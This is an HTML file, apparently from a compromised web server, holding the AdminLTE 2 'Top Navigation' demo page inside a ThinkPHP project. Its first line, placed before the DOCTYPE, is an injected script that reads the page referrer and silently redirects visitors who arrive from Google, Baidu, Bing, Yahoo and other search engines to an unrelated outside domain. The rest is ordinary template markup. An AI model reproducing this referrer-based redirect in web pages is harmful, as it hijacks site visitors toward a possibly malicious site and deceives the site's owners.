d:\wwwroot\wuchunhua\thinkphp\public\adminlte\pages\layout\top-nav.html
001:
<script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><!DOCTYPE html>
002:
<html>
003:
<head>
004:
<meta charset="utf-8">
005:
<meta http-equiv="X-UA-Compatible" content="IE=edge">
006:
<title>AdminLTE 2 | Top Navigation</title>
007:
<!-- Tell the browser to be responsive to screen width -->
008:
<meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">
009:
<!-- Bootstrap 3.3.7 -->
010:
<link rel="stylesheet" href="../../bootstrap/css/bootstrap.min.css">
011:
<!-- Font Awesome -->
012:
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.5.0/css/font-awesome.min.css">
013:
<!-- Ionicons -->
014:
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/ionicons/2.0.1/css/ionicons.min.css">
015:
<!-- Theme style -->
016:
<link rel="stylesheet" href="../../dist/css/AdminLTE.min.css">
017:
<!-- AdminLTE Skins. Choose a skin from the css/skins
018:
folder instead of downloading all of them to reduce the load. -->
019:
<link rel="stylesheet" href="../../dist/css/skins/_all-skins.min.css">
020:
021:
<!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
022:
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
023:
<!--[if lt IE 9]>
024:
<script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script>
025:
<script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
026:
<![endif]-->
027:
028:
<!-- Google Font -->
029:
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,400,600,700,300italic,400italic,600italic">
030:
</head>
031:
<!-- ADD THE CLASS layout-top-nav TO REMOVE THE SIDEBAR. -->
032:
<body class="hold-transition skin-blue layout-top-nav">
033:
<div class="wrapper">
034:
035:
<header class="main-header">
036:
<nav class="navbar navbar-static-top">
037:
<div class="container">
038:
<div class="navbar-header">
039:
<a href="../../index2.html" class="navbar-brand"><b>Admin</b>LTE</a>
040:
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar-collapse">
041:
<i class="fa fa-bars"></i>
042:
</button>
043:
</div>
044:
045:
<!-- Collect the nav links, forms, and other content for toggling -->
046:
<div class="collapse navbar-collapse pull-left" id="navbar-collapse">
047:
<ul class="nav navbar-nav">
048:
<li class="active"><a href="#">Link <span class="sr-only">(current)</span></a></li>
049:
<li><a href="#">Link</a></li>
050:
<li class="dropdown">
051:
<a href="#" class="dropdown-toggle" data-toggle="dropdown">Dropdown <span class="caret"></span></a>
052:
<ul class="dropdown-menu" role="menu">
053:
<li><a href="#">Action</a></li>
054:
<li><a href="#">Another action</a></li>
055:
<li><a href="#">Something else here</a></li>
056:
<li class="divider"></li>
057:
<li><a href="#">Separated link</a></li>
058:
<li class="divider"></li>
059:
<li><a href="#">One more separated link</a></li>
060:
</ul>
061:
</li>
062:
</ul>
063:
<form class="navbar-form navbar-left" role="search">
064:
<div class="form-group">
065:
<input type="text" class="form-control" id="navbar-search-input" placeholder="Search">
066:
</div>
067:
</form>
068:
</div>
069:
<!-- /.navbar-collapse -->
070:
<!-- Navbar Right Menu -->
071:
<div class="navbar-custom-menu">
072:
<ul class="nav navbar-nav">
073:
<!-- Messages: style can be found in dropdown.less-->
074:
<li class="dropdown messages-menu">
075:
<!-- Menu toggle button -->
076:
<a href="#" class="dropdown-toggle" data-toggle="dropdown">
077:
<i class="fa fa-envelope-o"></i>
078:
<span class="label label-success">4</span>
079:
</a>
080:
<ul class="dropdown-menu">
081:
<li class="header">You have 4 messages</li>
082:
<li>
083:
<!-- inner menu: contains the messages -->
084:
<ul class="menu">
085:
<li>
<!-- start message -->
086:
<a href="#">
087:
<div class="pull-left">
088:
<!-- User Image -->
089:
<img src="../../dist/img/user2-160x160.jpg" class="img-circle" alt="User Image">
090:
</div>
091:
<!-- Message title and timestamp -->
092:
<h4>
093:
Support Team
094:
<small><i class="fa fa-clock-o"></i> 5 mins</small>
095:
</h4>
096:
<!-- The message -->
097:
<p>Why not buy a new awesome theme?</p>
098:
</a>
099:
</li>
100:
<!-- end message -->
101:
</ul>
102:
<!-- /.menu -->
103:
</li>
104:
<li class="footer"><a href="#">See All Messages</a></li>
105:
</ul>
106:
</li>
107:
<!-- /.messages-menu -->
108:
109:
<!-- Notifications Menu -->
110:
<li class="dropdown notifications-menu">
111:
<!-- Menu toggle button -->
112:
<a href="#" class="dropdown-toggle" data-toggle="dropdown">
113:
<i class="fa fa-bell-o"></i>
114:
<span class="label label-warning">10</span>
115:
</a>
116:
<ul class="dropdown-menu">
117:
<li class="header">You have 10 notifications</li>
118:
<li>
119:
<!-- Inner Menu: contains the notifications -->
120:
<ul class="menu">
121:
<li>
<!-- start notification -->
122:
<a href="#">
123:
<i class="fa fa-users text-aqua"></i> 5 new members joined today
124:
</a>
125:
</li>
126:
<!-- end notification -->
127:
</ul>
128:
</li>
129:
<li class="footer"><a href="#">View all</a></li>
130:
</ul>
131:
</li>
132:
<!-- Tasks Menu -->
133:
<li class="dropdown tasks-menu">
134:
<!-- Menu Toggle Button -->
135:
<a href="#" class="dropdown-toggle" data-toggle="dropdown">
136:
<i class="fa fa-flag-o"></i>
137:
<span class="label label-danger">9</span>
138:
</a>
139:
<ul class="dropdown-menu">
140:
<li class="header">You have 9 tasks</li>
141:
<li>
142:
<!-- Inner menu: contains the tasks -->
143:
<ul class="menu">
144:
<li>
<!-- Task item -->
145:
<a href="#">
146:
<!-- Task title and progress text -->
147:
<h3>
148:
Design some buttons
149:
<small class="pull-right">20%</small>
150:
</h3>
151:
<!-- The progress bar -->
152:
<div class="progress xs">
153:
<!-- Change the css width attribute to simulate progress -->
154:
<div class="progress-bar progress-bar-aqua" style="width: 20%" role="progressbar" aria-valuenow="20" aria-valuemin="0" aria-valuemax="100">
155:
<span class="sr-only">20% Complete</span>
156:
</div>
157:
</div>
158:
</a>
159:
</li>
160:
<!-- end task item -->
161:
</ul>
162:
</li>
163:
<li class="footer">
164:
<a href="#">View all tasks</a>
165:
</li>
166:
</ul>
167:
</li>
168:
<!-- User Account Menu -->
169:
<li class="dropdown user user-menu">
170:
<!-- Menu Toggle Button -->
171:
<a href="#" class="dropdown-toggle" data-toggle="dropdown">
172:
<!-- The user image in the navbar-->
173:
<img src="../../dist/img/user2-160x160.jpg" class="user-image" alt="User Image">
174:
<!-- hidden-xs hides the username on small devices so only the image appears. -->
175:
<span class="hidden-xs">Alexander Pierce</span>
176:
</a>
177:
<ul class="dropdown-menu">
178:
<!-- The user image in the menu -->
179:
<li class="user-header">
180:
<img src="../../dist/img/user2-160x160.jpg" class="img-circle" alt="User Image">
181:
182:
<p>
183:
Alexander Pierce - Web Developer
184:
<small>Member since Nov. 2012</small>
185:
</p>
186:
</li>
187:
<!-- Menu Body -->
188:
<li class="user-body">
189:
<div class="row">
190:
<div class="col-xs-4 text-center">
191:
<a href="#">Followers</a>
192:
</div>
193:
<div class="col-xs-4 text-center">
194:
<a href="#">Sales</a>
195:
</div>
196:
<div class="col-xs-4 text-center">
197:
<a href="#">Friends</a>
198:
</div>
199:
</div>
200:
<!-- /.row -->
201:
</li>
202:
<!-- Menu Footer-->
203:
<li class="user-footer">
204:
<div class="pull-left">
205:
<a href="#" class="btn btn-default btn-flat">Profile</a>
206:
</div>
207:
<div class="pull-right">
208:
<a href="#" class="btn btn-default btn-flat">Sign out</a>
209:
</div>
210:
</li>
211:
</ul>
212:
</li>
213:
</ul>
214:
</div>
215:
<!-- /.navbar-custom-menu -->
216:
</div>
217:
<!-- /.container-fluid -->
218:
</nav>
219:
</header>
220:
<!-- Full Width Column -->
221:
<div class="content-wrapper">
222:
<div class="container">
223:
<!-- Content Header (Page header) -->
224:
<section class="content-header">
225:
<h1>
226:
Top Navigation
227:
<small>Example 2.0</small>
228:
</h1>
229:
<ol class="breadcrumb">
230:
<li><a href="#"><i class="fa fa-dashboard"></i> Home</a></li>
231:
<li><a href="#">Layout</a></li>
232:
<li class="active">Top Navigation</li>
233:
</ol>
234:
</section>
235:
236:
<!-- Main content -->
237:
<section class="content">
238:
<div class="callout callout-info">
239:
<h4>Tip!</h4>
240:
241:
<p>Add the layout-top-nav class to the body tag to get this layout. This feature can also be used with a
242:
sidebar! So use this class if you want to remove the custom dropdown menus from the navbar and use regular
243:
links instead.</p>
244:
</div>
245:
<div class="callout callout-danger">
246:
<h4>Warning!</h4>
247:
248:
<p>The construction of this layout differs from the normal one. In other words, the HTML markup of the navbar
249:
and the content will slightly differ than that of the normal layout.</p>
250:
</div>
251:
<div class="box box-default">
252:
<div class="box-header with-border">
253:
<h3 class="box-title">Blank Box</h3>
254:
</div>
255:
<div class="box-body">
256:
The great content goes here
257:
</div>
258:
<!-- /.box-body -->
259:
</div>
260:
<!-- /.box -->
261:
</section>
262:
<!-- /.content -->
263:
</div>
264:
<!-- /.container -->
265:
</div>
266:
<!-- /.content-wrapper -->
267:
<footer class="main-footer">
268:
<div class="container">
269:
<div class="pull-right hidden-xs">
270:
<b>Version</b> 2.4.0
271:
</div>
272:
<strong>Copyright © 2014-2016 <a href="https://adminlte.io">Almsaeed Studio</a>.</strong> All rights
273:
reserved.
274:
</div>
275:
<!-- /.container -->
276:
</footer>
277:
</div>
278:
<!-- ./wrapper -->
279:
280:
<!-- jQuery 3.1.1 -->
281:
<script src="../../plugins/jQuery/jquery-3.1.1.min.js"></script>
282:
<!-- Bootstrap 3.3.7 -->
283:
<script src="../../bootstrap/js/bootstrap.min.js"></script>
284:
<!-- SlimScroll -->
285:
<script src="../../plugins/slimScroll/jquery.slimscroll.min.js"></script>
286:
<!-- FastClick -->
287:
<script src="../../plugins/fastclick/fastclick.js"></script>
288:
<!-- AdminLTE App -->
289:
<script src="../../dist/js/adminlte.min.js"></script>
290:
<!-- AdminLTE for demo purposes -->
291:
<script src="../../dist/js/demo.js"></script>
292:
</body>
293:
</html>
294:
295:
296: